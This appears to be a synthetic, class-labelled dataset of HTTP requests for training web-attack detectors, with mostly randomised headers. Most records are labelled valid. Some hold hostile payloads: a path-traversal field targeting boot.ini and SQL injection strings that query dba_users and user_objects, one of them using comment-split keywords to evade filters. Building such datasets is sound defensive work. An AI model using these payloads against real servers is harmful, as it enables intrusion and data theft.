If-None-Match: *
If-Range: Fri, 25 Sep 09 02:20:52 CET
Max-Forwards: 6441
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM aU5nZWlhaG5vdGR1c2E0aE4wc3RpZXJyaG5ubmU3aWU=
Range: 868-,4005-,-324
Referer: http://www.lhffHnw.cz/hLh2dwta.asp
TE: chunked;q=0.1,chunked,gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 8.8; xn-ro; rv:1.0.6) Gecko/48885746
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 0.0 www.iostcoUh.htm
Transfer-Encoding: gzip
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16405
Start - Id: 14735
class: Valid
GET /athxF/xole30nqyRao/Diirr9/t2.5oEXJBPnS/oewaF0bnVrMVY5lDT3xU/eeW/lvaaeeirnrlc/wtMLnayouwAgQHL.js?ttjsspteaee=Tte&eheIazkinnT=oIL&4nhkitht9wse=948955&uzlesenz=%7C%3CtdoletA%2Fegsldh%3Csns&W@N@HvW=d&3gz0oa=i%3Bib%25include&rotawnw=8565834&7roshcsaeremeg=lbVoytte&eepe9fom=oLwEru&Tti=coeeidiro7includeicnr%28arcpz&im9=aqO&Shtieao=vbscriptmd+1%5Coh5sh%27&ZpexecE=6638&zqRedoDstxe5r=295701 HTTP/1.1
Host: www.ussle6t6Pt.ch
Connection: rkohjsd
Accept: application/*, video/mpeg;q=0.3, image/gif
Accept-Charset: x-mac-japanese;q=0.0, ks_c_5601-1987;q=0.4, iso-8859-3
Accept-Encoding: 
Accept-Language: 4eii-u3irh, emo-eiEetog, 8-letenEhe
Cache-Control: no-store
Client-ip: 232.189.121.255
Cookie: mSbXhtaccesfu=n';ulkuyreisc=omOUtalUplpeeX4;ocnn0h=aKV7m-;zrtKruJmejth=gJ79dGSrr;choo=i8dye;elxvaebanceczp=tV
Cookie2: $Version="50"
Date: Tue, 23 Sep 08 20:50:58 UTC
ETag: W/"ICnEVgx7JLgYqP3"
Expect: NTut2g
From: Cxeinso@uhrz.it
If-Modified-Since: Sun, 13 Jan 08 15:32:41 UTC
If-Unmodified-Since: Fri, 27 Apr 07 03:34:55 UTC
If-Match: *
If-None-Match: "JteIEYw0ggdmJVjB"
If-Range: Wed, 02 Apr 08 22:42:02 GMT
Max-Forwards: 361
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM MXNsZWd3ZGVtb0Ewb05vcmVzZGV3am9heXBubHZ0ZWV0dHRoZXZydA==
Range: 444847-,76-,3-393
Referer: /mjpif/deEEn/teshel/fpon.tar.gz
TE: trailers
Trailer: User-Agent
User-Agent: s998@.4 http://www.wErsRs.st
UA-CPU: StrongARM
UA-Disp: 733,9202,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 887x095
Via: 9.2 www.rmnserf.tiff
Transfer-Encoding: compress
Upgrade: wka/5.4, itcal/5.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14735
Start - Id: 33430
class: Valid
PUT /Eoersp1/rYtm8vk@/cF.php4? HTTP/1.1
Content-Length: 226
Content-Language: hn2qe,afreoz
Content-Encoding: identity
Content-Location: /7brh/il4goccL.shtml
Content-MD5: eUxiMGZlZXd3bHRsc2V3bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Jun 08 20:22:44 CET
Last-Modified: Mon, 21 Jun 04 13:53:55 GMT
Host: 58.122.44.4
Connection: erotcs
Accept: */*
Accept-Charset: iso-2022-kr;q=0.9, iso-8859-8-i, koi8-r;q=0.2, iso-8859-4;q=0.7, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=03
Client-ip: 2.240.215.248
Cookie: Tfc0=L~dropou&i
Cookie2: $Version="9"
Date: Wed, 27 Dec 06 15:41:12 UTC
ETag: W/"9AwtjROacYQZB-UM"
Expect: 100-continue
From: airohua@gtscArwrS.org
If-Modified-Since: Tue, 20 Jun 06 05:02:16 GMT
If-Unmodified-Since: Sat, 03 Jul 04 02:44:12 CET
If-Match: "pCacP02KLTf2zQWfic"
If-None-Match: *
If-Range: Sat, 19 Sep 09 11:51:54 GMT
Max-Forwards: 639
MIME-Version: 5.1
Pragma: tdtne=eirAigtH
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: Digest cnonce="gnii"
Range: -1,44294-,-026414
Referer: /b6rmre/eTliku/etohta/AgtP/ats8a.swf
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: roaSena0hl (lXhy-j)
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: 2.5 57.156.53.51
Transfer-Encoding: sScs; inE0nm=jt7nkt
Upgrade: ns5nt/0.1, asi/3.9, eipd/5.9
Warning: 293 182.183.228.1 "tleicervnM3ra" "Mon, 29 Dec 08 19:13:38 UTC"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

au7esenni9ynei=aap&tEga2lAsp=2Tv5yL&ijetutBcAfjhco5=ime8toahtnl&IohlTe=nWxQZD&s2Ftmp=56027243&tsihioubeso2snl=33071341&sl=r-.cQgI4fc&ru=3&hetixiora=ts7nYa(hcryeiTalt+i&sEtnat9a=hslrttnull1ar(suhhavingoori&semnih=65200791

End - Id: 33430
Start - Id: 12042
class: Valid
GET /asnniaqnroho/Mwgetlinkygdelete-f/idgetaadae/tj/thHaw@KfJrgXjOojz/zjvY49qlbPOQYqKLK/ardm6ehxihrfpglHs1f/Tve7mjw/ews/dhheodguNap/tnsazeilelXrs.png? HTTP/1.1
Host: www.ifqehi.be:96
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-icelandic, big5, utf-8;q=0.2, windows-1252, shift_jis;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: eeeN-isitgs, nrarD-oL;q=0.4, rmna-o, ee-30e, neol-aitr;q=0.8
Cache-Control: min-fresh=5289
Client-ip: 228.68.186.157
Cookie: 3e=5401863;safttbsrnco=u'otsrpD;nhmqohZ=z3ncopt
Cookie2: $Version="3"
Date: Fri, 31 Aug 07 13:38:21 GMT
ETag: "VhW0WNN2t7JPb8tIC2Gc"
Expect: 100-continue
From: seie@tihiEvEoh.it
If-Modified-Since: Wed, 24 Jun 09 17:52:22 UTC
If-Unmodified-Since: Wed, 26 Sep 07 14:42:41 CET
If-Match: *
If-None-Match: "x@xYKSKz63HV.Q_vA"
If-Range: Fri, 24 Nov 06 23:17:23 CET
Max-Forwards: 0375
MIME-Version: 6.1
Pragma: tAEagmf=hews
Proxy-Authorization: Digest nc=117fd3f5
Authorization: Basic NmFobmE6YW9lQTJl
Range: 421490-
Referer: http://www.aETqE.uk/aiphGr/pesstca/e84h5st/ds3el.bin
TE: trailers
Trailer: Warning
User-Agent: izEJ4pc5@ http://www.nsn9ho.st
UA-CPU: MIPS
UA-Disp: 123,4822,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 165x736
Via: 7.9 www.Tslqa3sq.jpeg, 4.3 97.206.83.175, 8.1 202.247.250.58
Transfer-Encoding: deflate
Upgrade: hrhef/3.6, dhe/2.9, s8nhre/8.0, dorop/7.3, o9g/4.9
Warning: 612 www.s27m.htm "eouphmjfeh7gCrcyr" 
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 0508881327530
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12042
Start - Id: 12767
class: Valid
GET /log9r9ogsou/xuFvPDPzSUvIHx/e4hosAtfaeeh/pElLVlyeVpV0.css? HTTP/1.1
Host: 225.156.7.137:80
Connection: akbn
Accept: application/x-tar;q=0.2, application/*
Accept-Charset: koi8-r;q=0.1, cp-932;q=0.4, x-mac-turkish, hz-gb-2312, cp-950
Accept-Encoding: compress, gzip;q=0.0, gzip
Accept-Language: ud-XMwh;q=0.4, es-eennta, t-o;q=0.1
Cache-Control: no-cache
Client-ip: 4.223.155.209
Cookie: Bebinoaplfar=sCteanay6mntttye1;nlosaPostxfcey=3407;ngtmpas24q=e0om;SXJsYX@0=uz
Cookie2: $Version="859"
Date: Sun, 26 Oct 08 20:20:46 UTC
ETag: W/"7U8lCc@WbWyv_96wzX"
Expect: wsaoe
From: ahe6lcme@tscunoU.st
If-Modified-Since: Tue, 01 Sep 09 04:14:27 CET
If-Unmodified-Since: Thu, 30 Sep 04 17:32:07 CET
If-Match: "5ER9HoffBqh@r.iX"
If-None-Match: *
If-Range: "zcx07QO8FhZ_bJf1I3D1"
Max-Forwards: 38
MIME-Version: 9.5
Pragma: fpe='ncq'
Proxy-Authorization: eqxrte snsH=briit
Authorization: Basic aXRsbzplNjlhc2g=
Range: 23407-76
Referer: http://ffi8ij.cz/rcd3r/tonqe/Beny/ematmroa.fgf
TE: trailers
Trailer: Accept-Encoding
User-Agent: r5fzf6gR-x http://www.eqCxra.com
UA-CPU: MIPS
UA-Disp: 508,842,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 575x699
Via: hyN/7.2 207.61.16.205
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 131 201.134.124.106 "nmLen" 
X-Forwarded-For: 98.230.255.210
X-Serial-Number: 29101464435877036
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12767
Start - Id: 18358
class: Valid
GET /srjnr/qOnph-/7IHxewXpnVc7-3h/tJfCaU0R/tQ42/6N/nyJOlp.nsf?ssoaleoeuf=be%3AewAoTmRic&zerdm1anstzr=38Cb&2egyksgeaisiy=egrcp9eyfc&eceueA=dnhs6ylnTsanhrr&mxcBjZIacceptnetcat=eaatrcLsza&Dl@vA=s.inZwRLqANj&QMbgsound@IOoS@Z=axn.-&7CxtermpsX=epmoet9+ei&5taohl6nen2=25228&poaIt=256206&mnaios8=08344864&68uate=+&reyEa=643683 HTTP/1.0
Host: www.aqfnlFu28o.ch
Connection: keep-alive
Accept: application/zip;q=0.6, video/mpeg
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: dL-ugSo;q=0.3, eFm-wecb;q=0.5, uvtrnt-m, sdaaT-pfn, u6gaes-r8tt;q=0.1
Cache-Control: no-store
Client-ip: 127.85.82.61
Cookie: ztdtfosbEPruma=22725;aepheznaassrxr3=xlscriptTDhe
Cookie2: $Version="653"
Date: Mon, 04 Jan 10 17:42:41 CET
ETag: W/"hbfxRV2Py0k_JJXKxc."
Expect: 100-continue
From: laeeuer@lnsmToe.com
If-Modified-Since: Thu, 09 Apr 09 03:57:38 GMT
If-Unmodified-Since: Wed, 16 Apr 08 10:06:44 GMT
If-Match: *
If-None-Match: "h29P8o_HYqIXtov"
If-Range: Wed, 02 Jul 08 06:16:30 GMT
Max-Forwards: 860
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Ta4ne eeunze=ehg4j4se
Range: 14861-5
Referer: /8kfsiiao/hnfstlh/Muuqts4/sr8tptp.tar
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.6 (Windows; U; WinNT 6.4; hs-ia; rv:1.9.0) Gecko/97456296
UA-CPU: x86
UA-Disp: 7961,862,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0744x394
Via: 5.2 233.8.30.169, HTTP/8.4 61.35.3.162, 2.7 36.44.68.155
Transfer-Encoding: gzip
Upgrade: qqdshd/4.3, htgf/9.7, yet/3.2
Warning: 749 108.217.159.253:908 "s7e4ipslsmltnjmoswu2" 
X-Forwarded-For: 157.29.76.83
X-Serial-Number: 185669982950
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18358
Start - Id: 45368
class: PathTransversal
PUT /njYa/earzm3eartbpteneCoz/Inarzr7t2/TdpgrsWwmboAm/oo1l7WAfjOQruLVe/0MRvaqtZKUsRda7/o7SalnesoietaOtsaAii/hSWjd44q6Ywy.GPtc.asmx? HTTP/1.1
Content-Length: 133
Content-Language: meidc,iTtxitac,de
Content-Encoding: gzip
Content-Location: http://www.7adjdsUe.be/1mhfOr.tiff
Content-MD5: dG1pdGlpZGlTaWhqaWV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Sep 09 06:28:25 CET
Last-Modified: Wed, 07 May 08 15:41:40 CET
Host: 74.187.114.14:80
Connection: 5yseh
Accept: video/mpeg;q=0.0, application/*
Accept-Charset: utf-8;q=0.1, macintosh;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=6
Client-ip: 45.42.189.117
Cookie: seNgsuctstazet= 2 ;e9z=scriptsyav znf;cois=62593119;replaceccJlikeY=2107424111;lt=cQNElKBKr;ZyY8ya8GzRi=9
Cookie2: $Version="0"
Date: Wed, 19 Dec 07 21:51:19 CET
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Sat, 20 Mar 10 11:23:22 UTC
If-Unmodified-Since: Mon, 05 Sep 05 01:51:12 CET
If-Match: "wPn3B3BbyL20NJvB"
If-None-Match: *
If-Range: Wed, 15 Feb 06 13:51:42 UTC
Max-Forwards: 33
MIME-Version: 4.4
Pragma: en6u=ri
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: otor7 orgso=hnot1E
Range: 74377-10,-135
Referer: /sEtd7h/arhaaE.pl
TE: trailers,gzip;q=0.4
Trailer: Referer
User-Agent: rH.fr5d@K http://www.hnih.cz
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: HTTP/8.7 182.24.46.159, enei/5.9 www.ctynna74.gif
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

YC5@KOSvI=657&p@ASIsQa=17&ycavrjesiw=hmsodpafohhba&fde=ndFB&OzMq_@Wplogr=e:\winnt\boot.ini&oLetlYiirts=8ypninputtlifromhg<Et 

End - Id: 45368
Start - Id: 42463
class: SqlInjection
GET /hUQ1diNcNJnd@Ow/VqIvCTk/nQZYXnc.dh@_qSsHxk5N/a0dqBAtJwUfZvUBA/wKqNRud15bunionaS/7XBCFdBY_gus5by9.nsf?kxaA=so2i&tn=%3B+++++exec++++get_cust%28+%27x%27%27+union+select+++object_name%2Cobject_type%2C%27%27x%27%27+++from++++user_objects+++++where+++%27%27nM%27%27+%3D++++%27%27++++%27++++%29%3B&tiFptiaptqe=mRJaWs&irseen1zn3ue=6&IH1K5DNelsF9=3245595&oaln=eeAfimgteo HTTP/1.1
Host: www.Es8qi.net
Connection: rtte
Accept: */*
Accept-Charset: isiri-3342, windows-1252;q=0.0, cp-936, windows-1255;q=0.6, iso-2022-kr;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale=1
Client-ip: 88.195.225.227
Cookie: oq7seNzswe=skd6b-xyGO;e2ewaoaOp=0
Cookie2: $Version="3"
Date: Fri, 13 May 05 05:54:37 GMT
ETag: "Fg4GgecH.zX4nmej"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Tue, 01 Mar 05 11:00:45 CET
If-Unmodified-Since: Mon, 13 Jun 05 07:15:18 CET
If-Match: *
If-None-Match: "eCxOqXeMm8Qt9Ze0IRNl"
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 30
MIME-Version: 9.0
Pragma: otoepa6='oEDisdE'
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: 7an4e 9cqe4e=chEots
Range: -9
Referer: http://cf8oj.gov/vmrd2en/bTdeO/toeiv/ztmuameh/erolt.msf
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: S2ilsroc (eeI5nLF)
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: identity
Upgrade: nhii/6.1, lbree/5.0
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42463
Start - Id: 1597
class: Valid
GET /zI6OJvdrtsiaE/qfitr3jdbees1ai/1vfwZ0JqQoK-PJD95/e.AWA1Rk7pM_JcdOHF/hGi8oIEC33xnttaxasZt/agr_I4D4boT/enasEuxhapaE/YJLmLV0q.png?pat=u%3D%5B3eAb+iueqftpnc%5D2o&Emrrxutj=bp2f8t6nued0oe HTTP/1.0
Host: 150.11.6.89
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-9;q=0.7, x-mac-chinesetrad, iso-8859-5, iso-10646-ucs-2;q=0.3
Accept-Encoding: *
Accept-Language: j1eTE-236xpeh;q=0.7, 4t5ernej-ay1we, T-omgjt, wntsv-ldelh
Cache-Control: no-cache
Client-ip: 117.148.138.175
Cookie: ZoHk8YZd=90898;xnetcat_p-OT-q=54183;lree3ellis=r3CsJ
Cookie2: $Version="4"
Date: Mon, 23 Jan 06 10:27:30 GMT
ETag: "knTGSe5R4krTx1@Te0aN"
Expect: 100-continue
From: AiEharoe@esac.fr
If-Modified-Since: Tue, 09 Mar 10 18:05:53 GMT
If-Unmodified-Since: Tue, 04 Oct 05 13:10:47 GMT
If-Match: "qPo6Rp_HD8LbNiB2"
If-None-Match: "nVANHx8Lq-Oa1MXc7NU"
If-Range: "694ZrWm1lEMPlugo"
Max-Forwards: 9327
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic cmlvNm5zOnJ0cHI=
Authorization: NTLM OWFvbmhlbnJsNWx0Y2FudHJ4c2EzZWFpZXVub2gzbmR6VzY0
Range: 3-44786
Referer: http://www.hglnzdl.cz/nh7l2o/salt/TrAbs/3ernxkkn/cngrtdAn.mp3
TE: trailers
Trailer: Expect
User-Agent: Mozilla/7.7 (X11; U; Linux i386 4.7; 2s-id; rv:5.8.6) Gecko/20931098
UA-CPU: x86
UA-Disp: 1710,881,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7934x8697
Via: HTTP/5.5 www.3jzzE.tiff, fl44/9.6 119.243.62.71:83, Obelc/7.9 www.usnne.htm
Transfer-Encoding: compress
Upgrade: ris/8.4, oaNa/5.8, eftew/0.0, nig0/1.8
Warning: 673 72.154.61.36 "gnhtlcs" "Wed, 10 May 06 10:46:29 UTC"
X-Forwarded-For: 240.238.253.4
X-Serial-Number: 29285068
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1597
Start - Id: 15330
class: Valid
GET /HLPYO9II3Acoboot.ini/RL@CupdateO/stD1qqcmFDXa/kwPobtS/ii3ecjrghntdXaas/hg5BRKDKqoBmR.css?sadtlqFoodgl=40&Eqrtn=8924251&6fns=ej&nzeotin=9&aoIfaqmzd=132146&rpsn=68365&3as=vain+tmpqezc0n&hocIumr=ot5Wsa4hopsxmtar&4e1nt=t8ihear HTTP/1.1
Host: 247.162.217.201
Connection: keep-alive
Accept: image/png
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=15800
Client-ip: 102.215.170.42
Cookie: udrbem=mbhlnhuEb23o;e9geufroksaDo=sqa1lite5ikN;nKwbnseismpros=mevalyel;NA_deleteYH=gtKeerlahEdguoohc;Sigee8o1=cisl2td8inasleiti
Cookie2: $Version="3"
Date: Tue, 19 Sep 06 10:54:24 CET
ETag: "Y0YUWysM8GX6fXC8j"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Tue, 10 Jul 07 13:14:00 UTC
If-Unmodified-Since: Sat, 25 Feb 06 08:29:45 UTC
If-Match: "EzU3@@6BGmmmsmtsgLvf"
If-None-Match: *
If-Range: "fP7rtFA024qfahdM"
Max-Forwards: 118
MIME-Version: 7.7
Pragma: m1ota='fn'
Proxy-Authorization: NTLM ZXNuZXNpZ2hvRWFpbGVpZ3RlMXJvbnNhaWUxaVJ0aGlyc2Rl
Authorization: Basic bHR0YTpvN3Zo
Range: 879-,-59988
Referer: http://www.V8R0g2o.uk/epl9e/natads/eezctS/Gl3ltpo.pl
TE: chunked,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: pvIh3dTvf http://www.eiiAstr9.com
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5504x488
Via: HTTP/3.2 www.gjnf4sE.shtml, 6.1 196.29.173.173:9, 0.7 www.e6dn.jpg:9596
Transfer-Encoding: identity
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 080 17.39.21.39 "2etaolnde" 
X-Forwarded-For: 139.65.0.173
X-Serial-Number: 7835814731
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15330
Start - Id: 198
class: Valid
GET /ntptui/p2EC5q/ttite1tbreltotpatr/lH.css?etdBe=50&sF=osth%25tsiettnuN&hhttpsopen5OvQKwWu=TpoDgukhomeE1ouli4&AOpkgtaa3=w&ahten=En7s&Tosil=ria%3A2um&og4icushiyo=lstr%28%5B&eeilsutaNd=7235765&tahooaunmd=t%3CemochatMnHn9%40mg%3Cc&tnia9=bAaEc HTTP/1.0
Host: 227.185.59.255
Connection: close
Accept: image/*, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: aalca-tshayt, BpmrEud-M;q=0.3
Cache-Control: no-store
Client-ip: 217.52.131.115
Cookie: ieitdeogrl=3175269;Mxp_lcugb5IP=rs;eeoi8arer=6;C1log2Nsystem=1rE
Cookie2: $Version="75"
Date: Fri, 02 Jul 04 05:54:01 UTC
ETag: W/"DSBddQD3Zg4giii"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Mon, 19 Feb 07 07:12:54 CET
If-Unmodified-Since: Fri, 27 Jan 06 24:07:52 GMT
If-Match: "mYtvfxTvRdonAxl"
If-None-Match: "@DV_KwhrXm.A6dQo"
If-Range: Mon, 13 Aug 07 02:52:18 CET
Max-Forwards: 6141
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: NTLM QnhmYWVpdG50dGttZGFHaTBoTm85dDByYXNVZGRoYWVlaHJmRXlpY29pZQ==
Range: 534828-
Referer: http://reai.com/fvooe/thneie4i/nirhi/ouydeun/htetu.rar
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.5 (compatible; MSIE 9.9; Win 9x; tTii2r)
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4314x599
Via: HTTP/6.5 191.174.196.218, neah/6.2 www.tglyrmm.png, HTTP/9.2 www.xouyd.css
Transfer-Encoding: compress
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 198
Start - Id: 18767
class: Valid
GET /eOaairrudihbonlre/Bj9Pe/q3sjC/suaneCqeaieiC2Ba/aA8t/eyOs9oa1ql9/ldcotoweheniDMi/EtRNSO2body/3I8yBrsrlv/ns1aRweplopitoq/i3Iezfiaj9lreih.shtml? HTTP/1.1
Host: 114.141.205.234:80
Connection: ttNwee
Accept: */*
Accept-Charset: windows-1258;q=0.9, us-ascii, iso-8859-4;q=0.1, x-mac-arabic;q=0.2, iso-8859-5
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 130.75.186.181
Cookie: sbp=uxisw2esr;kqfeAosrtjeT=oS1uj5q;ne1o38a1a=sZ0kzC
Cookie2: $Version="015"
Date: Fri, 10 Nov 06 02:42:15 UTC
ETag: "F4pahYczbUumgOsX-cl1"
Expect: 100-continue
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Tue, 01 Mar 05 17:55:13 CET
If-Unmodified-Since: Tue, 27 Jan 04 12:46:05 GMT
If-Match: "XIfq70dkdtMZrp3l.1"
If-None-Match: *
If-Range: Thu, 01 Mar 07 14:30:28 CET
Max-Forwards: 5177
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iiniu"
Authorization: eErmCd Tnoivh=edw7
Range: 1460-
Referer: http://www.spoo.de/eUtmav.asp
TE: deflate;q=0.3,trailers,chunked
Trailer: Connection
User-Agent: Mozilla/2.7 (X11; U; Unix 9.5; or-sr; rv:2.3.5) Gecko/44623946
UA-CPU: Sparc
UA-Disp: 414,132,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 886x1949
Via: FTP/8.6 www.htalsX2m.png
Transfer-Encoding: compress
Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18767
Start - Id: 15966
class: Valid
GET /eQb@AhROQVEUlG.jpg?oiou=rOazeid&idiy=wOkJ3RgOj5&0cks01ens=td&nO=5hmlr7eiSo9mptn&ipirmoiw=unione%3C&tjdiiy=bX8%40zB8&tutablh=eCzJo6gW-&isock_streamlRR=396585 HTTP/1.1
Host: 27.111.132.59
Connection: ttedxsns
Accept: application/*;q=0.6
Accept-Charset: x-mac-arabic;q=0.2, x-mac-cyrillic;q=0.8
Accept-Encoding: 
Accept-Language: yvqfriny-sotaqrs8
Cache-Control: only-if-cached
Client-ip: 110.241.224.8
Cookie: bdpduse2s=a;6uldeit=2039
Cookie2: $Version="544"
Date: Sat, 12 Sep 09 16:32:18 UTC
ETag: W/"ihU7Hhm0uf5lg-.Z"
Expect: u1thh0
From: ddlde@onchnbe.de
If-Modified-Since: Sat, 31 May 08 03:29:37 UTC
If-Unmodified-Since: Sun, 16 Apr 06 03:18:15 CET
If-Match: "xsiDcybyu2lupD1pc@"
If-None-Match: *
If-Range: *
Max-Forwards: 3144
MIME-Version: 1.8
Pragma: chiNohR=aHUnao
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: Basic ZHNSbjY6ZHM2aWVzdmw=
Range: 08-06,-75180
Referer: /C6strhe.dll
TE: chunked,chunked,deflate
Trailer: Trailer
User-Agent: l9jDLeE http://www.n8st.gov
UA-CPU: x86
UA-Disp: 843,2747,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 221x576
Via: noR/1.1 85.0.230.225
Transfer-Encoding: deflate
Upgrade: dg6/8.1
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 37.146.157.183
X-Serial-Number: 902795825
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15966
Start - Id: 41704
class: SqlInjection
GET /i4_UypK/pi/lPiu/tYCBkG0Tk_dzLbnq4rtH/IiuZ7W9V3/Ou/uVjna/IlikexrY8JT3.bin?yelo7ooR0=qjap7Vx6u&fnzilIsnwtte=%7CdI5+csitag1pu&ehaezjubya=asttnre&Xs0dkVetcNh1Qu=chairs%27+++UN%2F**%2FION++SEL%2F**%2FECT++++aS++++FROM+++++dba_users++WHERE+t1oed1tD+++like++++%27%2525&fcset=qed&wgsotbsnpoeIaa=1&FYGbodyDaNPXeybgsound=r7_%40&YCdeleteD=t%3Ab&hslcdf=2182421&3l9yvektet=unionranl&SLuaVD=3e7dtnas+o%286&Ifm9uOj8NXinclude7=mt%28&whgteivlHieia=67212&sHX07includeb=rrns%40s&rHZige2vtnp6Ohk=72571 HTTP/1.0
Host: 249.38.161.76
Connection: xee5M
Accept: image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6d-mczv
Cache-Control: min-fresh=712
Client-ip: 51.187.24.113
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="1"
Date: Sat, 04 Feb 06 02:42:01 CET
ETag: "AG5CAg.oj.vm0Whv.Z2"
Expect: nllry
From: nrnG@tfeie8.biz
If-Modified-Since: Wed, 08 Dec 04 11:10:56 GMT
If-Unmodified-Since: Sun, 30 Nov 08 21:03:55 UTC
If-Match: "um4ioqapHLZoMyb_ypjo"
If-None-Match: *
